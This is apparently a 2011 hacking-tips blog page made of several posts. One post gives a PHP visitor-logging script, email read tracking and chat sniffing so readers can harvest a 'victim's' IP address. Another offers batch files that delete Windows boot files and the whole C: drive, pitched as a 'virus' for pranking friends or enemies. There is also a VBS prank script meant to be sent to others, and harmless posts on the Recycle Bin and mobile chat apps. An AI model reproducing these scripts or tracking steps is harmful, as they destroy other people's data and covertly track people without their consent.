Like us on facebook and stay updated! Click here


Featured Video

FACEBOOK HACKING

learn to hack facebook accounts.and learn facebook hidden tips and tricks.

GOOGLE ACCOUNT HACKING

Learn to hack G mail,orkut or any google accounts and learn hidden google tricks.

COMPUTER TIPS AND TRICKS

Learn about Computers and how to hack Computer.hidden and funny Computer tips and tricks.

LEARN ALL ABOUT COMPUTER VIRUS

learn to make virus and how virus works.learn how to prevent virus attacks.

LEARN REAL HACKING FROM COOLGURU007

Learn the Real Hacking tricks and tips for free from CoolGuru007.

Showing posts with label windows 7. Show all posts
Showing posts with label windows 7. Show all posts

Friday, 16 December 2011

How to get IP address of another computer remotely





 Using some very basic tricks we can find the IP address of any remote computer and then you can start your further hacking into the remote system like port scanning and finding vulnerabilities to enter in to the system and hack it.


There are several methods to get an IP address of the victim but i will share few and specially the best one's that can tell you IP address in just few clicks and also all are free methods and special thing is about it is all are manual methods that means you did not require any tool.




4 ways to get the IP address of the Victim or another Computer:
1. Using PHP notification Script
2. Using Blogs and Websites
3. Using Read Notify service
4. Sniffing during Gmail and yahoo chat  sessions

What is an IP address? 
Basically IP address (Internet Protocol address) is a unique numerical value that is assigned to any computer or printer on a computer network that uses an internet protocol for communication purpose. Protocol is basically rules( for Network its rules for communication). 

IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing

For exploring more about IP addressing read on wikipedia.


How to Find IP address of another computer?

1. Using PHP notification Script
Using this Notification script you can get the IP address in just seconds. Steps of using this PHP script:
a.
code:

<?
?> 
<?php 
    $day = date("l"); 
    $month = date("F"); 
    $year = date("Y"); 
    $date = date("jS"); 
    $hours = date("g"); 
    $minutes = date("i"); 
    $tod = date("A"); 
     
    if(substr($minutes, 0, 1) == 0) 
        $minutes = substr($minutes, 1, 2); 
?> 
<? 
$ip = $_SERVER['REMOTE_ADDR']; 
?> 
<? 
$fp=fopen("ip.html","a"); 
fputs($fp,"$ip*");
fclose($fp);
?> 
save it as index.php
now create a .html file, ip.html
or simply 
 Download the PHP notify script and extract files.

b. Now you will get two files IP.html and index.php . You need to upload these two files to any free web hosting server.
Example: i used www.my3gb.com to upload these two files. Create an account there and upload these two files there as shown below.


c. Now you will need to send the link of index.php to the victim whose password you want to get. to get the link click on index.php shown in above snapshot. Now a new window will open copy the link in the address bar and send to the victim whose IP address you want.
d. Now when the victim opens the above link nothing will open but his Ip address is written into the ip.html file. So open the ip.html file to get his IP address.
e. That's all this method... I


2. Using Blogs and Websites
This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.
That's only.


3. Using Read Notify service
This is an email based service. Steps to use Read Notify service:
a. First open the Read Notify website : RCPT
b. Now register on this website and then it will send you confirmation mail. Verify your account.
c. Once your account is activated. 
Do the following steps use this service:

  1. Compose your email just like you usually would in your own email or web email program
  2. Type:   .readnotify.com   on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: ABC@gmail.com.readnotify.com  
  3. Send your email
Some things to remember: 
  • don't send to and from the same computer
  • if your email program 'auto-completes' email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com
  • if you are cc-ing your email to other readers, you must add tracking to all of them 


4.  Sniffing Yahoo and Gmail Chat sessions
With the help of Sniffers like ethereal, wireshark etc we can sniff the Gmail, and yahoo chat sessions while we are chatiing to any our friend and extract the IP address from there.
5. Bonus Method for Online Gamers
We can also get the IP address from online games like counter strike, age of empires in Game ranger etc.. Many counter strike servers use amx mode. Just view which people are connecting and whats their IP addess as plugins show the IP address of people connecting to the game server.  If you have more access to counter strike server you can use status command in console. Just go to console and type "status"(without quotes) and press enter there you can see all players details his steam ID and much more depending upon server.
:)

Saturday, 3 December 2011

DESTROY ANY COMPUTER EASILY WITH ONE CLICK




Do not try this at your own computer: Well remember that u don’t try this @ ur own computer in any circumstances becausethe file we are going to create will reboot the computer onceand also delete all the file needed by the computer to restartagain ,so u got it right well if u r pranking with ur friend or ur enemy remember that his or her will never restart unless new Windows is installed.

Here is the Guide to Destroying Virus:
Open up notepad and copy and paste this:

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

And SAVE this file as .bat
Now that’s it ur Virus is ready well it’s a Monster Virus .
Remember Don’t click on this file in ur Computer.

BATCH FILE TRICK TO DELETE C: DRIVE


Type these commands in notepad

@Echo off
Del C:\ *.* |y


And save that as .bat 
not .txt and RUN IT
It will delete the content of C:\ drive...

PLEASE NOTE::::: don't run that .bat file on your system .... it will delete c:...

PRANK:COMPUTER GHOST




This will open Notepad, slowly
type "Hello, how are you? I am good thanks" after some time of clicking the file.




IN NOTEPAD


Type :

WScript.Sleep 180000                                      
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

HOW TO HIDE THE RECYCLE BIN


To show or hide the Recycle Bin on the desktop

  1. Click the Start button Picture of the Start buttontype desktop icons into the search box, and then click Show or hide common icons on the desktop.
  2. In the Desktop Icon Settings dialog box, do one of the following:
    • To hide the Recycle Bin, clear the Recycle Bin check box.
    • To show the Recycle Bin, select the Recycle Bin check box.
  3. Click OK.
Note

Note

Even when the Recycle Bin is hidden, deleted files are still stored there temporarily until you choose to permanently delete them or recover them.

Thursday, 17 November 2011

How to chat on java mobile ?


hi,,,, today i will write about how to chat on mobile like instant messenger !

by using this applications you can send or receive files and photographs , you can send buzz etc. on the mob.
you can live chat on face book ! 
here are two best application according to mine.
you may love that application
1.ebuddy.
if you wanted to use this application you have to first install this application on mob. and register on this site . it's very simple after doing this job, now you have to sing in to your social networking web site or any other account means to say you have to link other account to this ebuddy account . i love this application ! here are some screen shots :


Download

2. Nimbuzz :
Now this app. is also an  interesting  app because you may now that yahoo messenger has many room chat
like Gujarat global chat, India global chat , Australia global chat etc...
as same as nimbuzz is having privet and global chat rooms .
as same as ebuddy you can also chat with facebook friends on nimbuzz and if two friends has a nimbuzz account you can call each other ! for free ! but limited minutes . here are some snaps of it :



Download

3. Migg33 : 
 this app is also good . in migg33 you can not just call migg33 member but you can call also out side friends in this case migg33 server calls you and connects to your requested mobile number !   
mig33 is the largest global community that brings you the power of the internet right to your mobile phone.Chat with millions of mig33 users .Keep friends in the loop with new status updates.Make cheap calls to any phone, anywhere, anytime!.SMS friends instantly with a cheap flat-rate.Personalize with cool themes, wallpapers and ringtones.Express yourself with tons of different emoticon packs.Share photos directly with all your friends and save them online.Free credits for inviting friends to join. here are some snaps of it :





Download 


4. Skype:
yaah..... skype we all now about it . it's a free voip site which is providing totally free call to skype 2 skype and providing very cheap price call to mobile number's  it also providing video call.
this software has a little limitation on java based mobile . after installing this app. you can directly call mobile to pc ! skype to skype call ! chat is working most of nokia mobile so enjoy this all apps... here are some snaps of it :




  Download
 
 if you like my posts suggests to you friends . or became a fan on face book !     

Twitter Delicious Facebook Digg Stumbleupon Favorites More